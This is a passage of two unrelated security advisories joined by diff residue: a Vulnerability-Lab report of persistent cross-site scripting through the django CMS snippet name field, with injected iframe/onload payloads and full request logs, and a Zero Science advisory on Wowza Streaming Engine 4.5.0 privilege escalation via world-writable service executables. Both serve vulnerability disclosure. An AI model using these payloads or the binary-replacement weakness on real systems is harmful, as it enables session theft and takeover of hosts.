the stable saved categories provoke the execution of the payload.
PoC: Snippet Module [./djangocms_snippet/snippet/] (Execution Point) <select> <option>
...
<fieldset class="module aligned ">
<div class="form-row field-snippet">
<div>
<label class="required" for="id_snippet">Snippet:</label>
<div class="related-widget-wrapper">
<select id="id_snippet" name="snippet">
<option value="">---------</option>
<option value="3" selected="selected">"><"<img src="x">%20%20>"<iframe src="a">%20<iframe>
"><"<img src="x">%20%20>"<iframe src=http://www.vulnerability-lab.com onload=alert(document.cookie)<>[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]%20<iframe></iframe></option>
<option value="1">Social AddThis</option>
<option value="2">tour "><"<img src="x">%20%20>"<iframe src=a>%20<iframe></option>
</select>
<a href="/en/admin/djangocms_snippet/snippet/3/?_to_field=id&_popup=1" class="related-widget-wrapper-link change-related"
id="change_id_snippet" data-href-template="/en/admin/djangocms_snippet/snippet/__fk__/?_to_field=id&_popup=1" title="Change selected Snippet">
<img src="/static/admin/img/icon_changelink.gif" alt="Change" height="10" width="10">
</a>
<a class="related-widget-wrapper-link add-related" id="add_id_snippet" href="/en/admin/djangocms_snippet/snippet/add/?_to_field=id&_popup=1" title="Add another Snippet">
<img src="/static/admin/img/icon_addlink.gif" alt="Add" height="10" width="10">
</a>
</div>
</div>
</div>
</fieldset>
...
--- PoC Session Logs [POST] (Injection) [GET] (Execution) ---
Status: 200[OK]
POST http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
POST-Daten:
POSTDATA =-----------------------------30880199939743
Content-Disposition: form-data; name="csrfmiddlewaretoken"
LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm
-----------------------------30880199939743
Content-Disposition: form-data; name="_popup"
1
-----------------------------30880199939743
Content-Disposition: form-data; name="_to_field"
id
-----------------------------30880199939743
Content-Disposition: form-data; name="name"
test <img src="x">%20%20>"<iframe src="a">%20<iframe>
"><"<img src="x">%20%20>"<iframe src=a>[PERSISTENT INJECTED SCRIPT CODE VIA SNIPPET NAME!]%20<iframe>
-----------------------------30880199939743
Content-Disposition: form-data; name="html"
sd
-----------------------------30880199939743
Content-Disposition: form-data; name="template"
aldryn_tour/tour.html
-----------------------------30880199939743
Content-Disposition: form-data; name="slug"
tour
-----------------------------30880199939743
Content-Disposition: form-data; name="_save"
Save
-----------------------------30880199939743--
Response Header:
Transfer-Encoding[chunked]
X-Proxy-Request-Received[0]
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
X-Aldryn-App[django-cms-3-3-demo-sopegose-stage]
Content-Language[en]
Expires[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html; charset=utf-8]
Set-Cookie[sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; expires=Mon, 18-Jul-2016 09:34:19 GMT; Max-Age=1209600; Path=/]
-
Status: 301[MOVED PERMANENTLY]
GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
Response Header:
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html; charset=utf-8]
Location[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x/]
Content-Language[en]
-
Status: 200[OK]
GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/a/[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
Response Header:
Transfer-Encoding[chunked]
X-Proxy-Request-Received[0]
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
Content-Language[en]
Expires[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html]
Reference(s):
http://django3-3-0.localhost:8080/
http://django3-3-0.localhost:8080/en/
http://django3-3-0.localhost:8080/en/admin/
http://django3-3-0.localhost:8080/en/admin/cms/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/
http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/
http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/9/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the vulnerable Name input field in the add snippets editor module.
Restrict the input and disallow the usage of special chars. Escape the entries in case of emergency and use plain-text values.
Encode in the snippets module listing the vulnerable box with the name listing to prevent the execution point of the vulnerability.
Resolution:
Patches to resolve the issues have been applied to Django's master development branch and the 1.10, 1.9, and 1.8 release branches.
The patches may be obtained from the following changesets:
- On the development master branch
- On the 1.10 release branch
- On the 1.9 release branch
- On the 1.8 release branch
The following new releases have been issued:
- Django 1.10rc1
- Django 1.9.8
- Django 1.8.14
Reference(s):
https://developer.mozilla.org/en-US/docs/Web/API/element/innerHTML
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the django cms is estimated as medium. (CVSS 3.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

84
platforms/windows/local/40132.txt Executable file
View file

@ -0,0 +1,84 @@
Wowza Streaming Engine 4.5.0 Local Privilege Escalation
Vendor: Wowza Media Systems, LLC.
Product web page: https://www.wowza.com
Affected version: Wowza Streaming Engine 4.5.0 (build 18676)
Wowza Streaming Engine Manager 4.5.0 (build 18676)
Summary: Wowza Streaming Engine is robust, customizable, and scalable
server software that powers reliable video and audio streaming to any
device. Learn the benefits of using Wowza Streaming Engine to deliver
high-quality live and on-demand video content to any device.
Desc: Wowza Streaming Engine suffers from an elevation of privileges
vulnerability which can be used by a simple authenticated user that
can change the executable file with a binary of choice. The vulnerability
exist due to the improper permissions, with the 'F' flag (Full) for
'Everyone' group. In combination with insecure file permissions the
application suffers from an unquoted search path issue impacting the
services 'WowzaStreamingEngine450' and 'WowzaStreamingEngineManager450'
for Windows deployed as part of Wowza Streaming software.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Java Version: 1.8.0_77
Java VM Version: 25.77-b03
Java Architecture: 64
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5339
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5339.php
03.07.2016
--
C:\Users\lqwrm>sc qc WowzaStreamingEngineManager450
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WowzaStreamingEngineManager450
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wowza Streaming Engine Manager 4.5.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\lqwrm>cacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe"
C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe Everyone:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
==========
C:\Users\lqwrm>sc qc WowzaStreamingEngine450
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WowzaStreamingEngine450
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wowza Streaming Engine 4.5.0
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\lqwrm>icacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe"
C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files